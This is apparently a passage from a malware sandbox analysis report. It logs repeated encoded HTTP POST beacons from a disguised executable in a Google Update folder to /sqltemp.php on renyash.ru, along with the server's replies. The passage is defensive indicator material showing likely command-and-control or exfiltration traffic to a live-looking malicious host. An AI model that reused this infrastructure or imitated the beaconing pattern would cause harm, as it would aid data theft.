                                                                                                                  Jan 1, 2025 16:03:34.611102104 CET1124OUTData Raw: 56 52 5f 55 54 5e 51 50 58 56 52 59 56 50 59 5e 5b 58 54 5b 55 5c 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_UT^QPXVRYVPY^[XT[U\P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._&,> $-?C/)>7>;<?*=' 2Z?%?9:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:34.698385000 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:34.984730959 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksvlGXq0Ai7uq3BOe3Mhz%2F8FHylKRp65k888y2%2FUQO9B5s6vlt3ziU9XNMCzV6O1e%2F%2FU%2Fmr6cbXaG2syKeIfkzUTsgQvnuSMM02lgSWNxr0xhg71tOAcC17dMNR2mIH9WbuPYPLz"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3659998e2c481-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2661&min_rtt=1513&rtt_var=2864&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=136423&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  112192.168.2.662751104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:35.112445116 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:35.469870090 CET1124OUTData Raw: 53 57 5a 51 54 5e 51 56 58 56 52 59 56 5d 59 51 5b 5f 54 5c 55 5c 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SWZQT^QVXVRYV]YQ[_T\U\P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[3/54!3X?/T -#(: =-4 !,*8)%'T.&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:35.557209969 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:35.822882891 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRqle7UAq9bQ8%2FFh%2B1jUSx%2FRvFncuwFQowryD%2BXFWvi7h%2BQE1FsQT06gYqwOQFvyJwbefYi4uOCwAXbyhCB1Rk5fVqNgEjOfzztWX3Mox3tApffvEYpAEbTiKqNPZZUKp0Dt3jmA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3659ef9bb2395-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2663&min_rtt=2031&rtt_var=2026&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=205894&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  113192.168.2.662752104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:35.995052099 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:36.345165014 CET1124OUTData Raw: 53 53 5a 50 54 50 51 57 58 56 52 59 56 5d 59 53 5b 5e 54 5f 55 5c 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZPTPQWXVRYV]YS[^T_U\P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._3<>7<9'-#B;:&!-;(_;S(= 4<"&/?S9:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:36.438611984 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  114192.168.2.662753104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:36.586746931 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:36.938668966 CET1964OUTData Raw: 53 57 5f 57 51 5c 54 50 58 56 52 59 56 5d 59 5e 5b 5d 54 5e 55 58 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_WQ\TPXVRYV]Y^[]T^UXP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&/: ?:3(,*=R#<9),]#<*;2Y?W-*&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:37.030456066 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:37.320019007 CET958INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g60EwD1PEg%2FBgSSRpQ1YlLHxRy3fjB5So8uqbPzA6ELIM5Nvt%2F8Bve%2Fc7VaTwMyfak1xRoB8HSuO9Np3onl2o6R9t1%2BFsLAy8Hq1OviF84050ad4EOcg3%2BvSiv6NktYQgsZWaNL%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365a82ebcf3bb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1566&rtt_var=592&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=919395&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 29 13 36 56 25 0b 2f 03 2b 3d 2c 0e 25 10 0c 5b 3f 38 26 17 27 2e 3b 5a 3d 39 2b 1e 22 12 35 59 32 06 33 02 34 04 3b 1c 24 34 2b 59 05 1c 20 44 35 01 23 01 2a 5b 2b 16 32 2c 3e 03 24 00 24 5e 2b 38 01 0c 20 38 3b 59 30 13 16 5b 2a 04 28 1d 30 12 20 03 2f 3f 08 0d 30 10 2c 54 00 11 25 0f 25 22 23 01 20 27 2c 10 35 0f 21 1d 31 37 2a 56 32 3c 24 09 20 5f 26 1b 32 22 3b 1d 22 1d 25 02 26 5d 31 10 37 13 01 18 28 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q)6V%/+=,%[?8&'.;Z=9+"5Y234;$4+Y D5#*[+2,>$$^+8 8;Y0[*(0 /?0,T%%"# ',5!17*V2<$ _&2";"%&]17(>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  115192.168.2.662754104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:36.739120960 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:37.094784975 CET1124OUTData Raw: 56 51 5f 5d 54 5f 51 57 58 56 52 59 56 5e 59 52 5b 5b 54 5e 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_]T_QWXVRYV^YR[[T^UXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?)#,>%>?A,9"#=^<_#R*=$]7<++2;:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:37.183365107 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:37.461478949 CET801INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMj0gG31lrZdmLH6hXKk8ovMaG5tiRf1%2Feb1PhzJtNVLO2Xqh8EGGOr0jJzkQvm905xj5ayhuD2Wu7AwLnZQtPoz9YiqhiHW2GtCw22fmjX7QSABncuTvkebSDsDFAfLVqbUO8cw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365a91f9a4405-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=1651&rtt_var=1449&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=293644&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  116192.168.2.662755104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:37.580358982 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:37.938699961 CET1124OUTData Raw: 56 57 5f 51 51 5c 54 50 58 56 52 59 56 5b 59 5e 5b 5c 54 51 55 58 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VW_QQ\TPXVRYV[Y^[\TQUXPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._'7/-'=<;)>!-0?)'S*$[42X+6%+T:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:38.034554005 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:38.290910959 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qW2ONNKKyfc8ePWKZTwBIh60ir5wAnaAyEkpM02gJOKP6xT2zvhlDjbXxLTVtYWaeT3hIsVau%2FFXQnEoNQWuOCVbHc4yTHvlXxuzMkhpmlsJIX%2FmdaURr%2F46dBCEHEY8p5o%2BIAk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365ae69dd8c24-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5036&min_rtt=1957&rtt_var=6893&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=54901&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  117192.168.2.662756104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:38.429307938 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:38.782418966 CET1120OUTData Raw: 53 50 5f 5d 54 58 54 5c 58 56 52 59 56 59 59 55 5b 5e 54 51 55 5a 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_]TXT\XVRYVYYU[^TQUZP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._' Y9^%=7.*> -??U*>##+]*8!C2,*&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:38.908606052 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:39.168900967 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEBBl0qENQVc7HS3w73ai%2BEEbz9qcWvAE%2FzYstrLWvzDtaeY1aQyfvXraNMDwpUg1Li1xlRrVk3BRID4DKP08T4XmSBCjsNm%2FFYbU4dM3bLZIdCdZ%2BF1%2FwJBBcxDLzBd%2Fv0rDFkj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365b3dfeb238e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3717&min_rtt=1990&rtt_var=4201&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1422&delivery_rate=92340&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  118192.168.2.662757104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:39.299521923 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:39.658600092 CET1124OUTData Raw: 56 50 5f 52 54 58 54 54 58 56 52 59 56 5f 59 52 5b 5f 54 5f 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_RTXTTXVRYV_YR[_T_UZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'?=\#&$>$;- 0Y+)#R==#727(8%C$/9:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:39.751976967 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:39.925379038 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYnu1ZkmwL4EDD19D14ooVoF3ufcCvFFpos4%2BPaMnghRmsLQAJ5pEGs4eBZqXTjniwiOn2U9PZ42lExVVd1X4bI%2B44YMVjDouMIp9bigY%2FR5CEWe93D6shVMAGc2fEeCExijdEXT"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365b92fd443aa-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1776&rtt_var=685&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=787911&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  119192.168.2.662758104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:40.053627968 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:40.408674002 CET1124OUTData Raw: 56 57 5f 51 51 5b 54 55 58 56 52 59 56 5c 59 5e 5b 5f 54 5b 55 5b 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VW_QQ[TUXVRYV\Y^[_T[U[P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X',> /]$X /*#?W*>X!2+]+>2<<.*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:40.506849051 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:40.771244049 CET814INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUL2r3aG2a%2Bqh6K%2FAqhbotEKkuUxH%2FG1jUSOSFTk5arZGMelZ04oCyxQX86Mpp6yR09mEvQkV%2Br26FUu%2BZHVpBGqlAQFdgZkAkj%2B5oz%2FldqPxbWIJ7SO%2FbQwaeBiXcY87z6Bius3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365bddae743d9-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4343&min_rtt=1734&rtt_var=5869&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64567&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  120192.168.2.662759104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:40.895390034 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:41.251220942 CET1124OUTData Raw: 53 52 5a 54 51 5a 54 52 58 56 52 59 56 5d 59 55 5b 52 54 5f 55 5d 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
